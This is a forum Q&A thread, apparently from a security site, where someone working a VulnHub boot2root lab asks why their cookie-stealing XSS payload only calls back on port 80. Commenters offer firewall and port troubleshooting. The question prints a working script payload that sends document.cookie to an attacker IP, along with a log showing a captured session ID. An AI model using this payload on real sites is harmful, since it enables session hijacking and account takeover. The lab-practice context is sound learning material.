# XSS on port other than 80 not working

Tags: xss

I am currently doing a boot2root VulnHub machine and I have found an XSS entry point to steal admin cookies.

The strange thing is that if I run my SimpleHTTPServer on port 80 then the following payload triggers

`<script>document.write('<img src="http://192.168.1.130/'+document.cookie+'" width=0 height=0 border=0 />');</script>`

And I get the cookie like this

`192.168.1.14 - - [13/Sep/2020 09:23:36] "GET /PHPSESSID=m18d10ghina3pbtlhn5sttrm8o HTTP/1.1" 404 -`

But if I run my SimpleHTTPServer let's say on port 4242 or any other port (I have tried a handful), the following payload does not trigger

`<script>document.write('<img src="http://192.168.1.130:4242/'+document.cookie+'" width=0 height=0 border=0 />');</script>`

Or at least I don't see anything.

Please note that the boot2root VM seems to call every minute without fail.

I don't know why this is happening.  Does SimpleHTTPServer only work on port 80? It could be as simple as that, I guess, but I see examples on the internet with other ports being used so I doubt this is the case.

Comment: Is the port open on the firewall? Is the server actually running on that port and can you navigate to it to be sure? On the victim machine, can you browse to `http://192.168.1.130:4242/`? In a troubleshooting scenario, you need to confirm each link in the chain, from both ends, as far as you can.

Comment: As for configuring your server, that's not a security question and very easily looked up: https://serverfault.com/questions/258551/how-to-change-port-on-simplehttpserver-in-linux

Comment: Hi @schroeder, Thank you for the prompt reply. I will look at all the things you mentioned and will get back. I cannot go on the victim machine, it is a boot2root machine so the point of it is that I have to escalate privileges before using it, actually, the first thing is to get into the machine itself
Thanks again

Comment: Ok, I can connect to my server on any port, therefore 4242 works. In terms of firewall opened ports, I am not entirely sure how to check this, I ran the command below and I think this means everything is opened basically, although I could be totally wrong
sudo iptables -nvL
Chain INPUT (policy ACCEPT 3293 packets, 1850K bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination

Comment: Chain OUTPUT (policy ACCEPT 2570 packets, 296K bytes)
 pkts bytes target     prot opt in     out     source               destination

Comment: Please edit your question with all these details. And you can probably remove the parts of the question dealing with the HTTP server now that you have the answer to that part. Now the interesting bit might be to know if there is a firewall on the victim machine preventing connections to that port...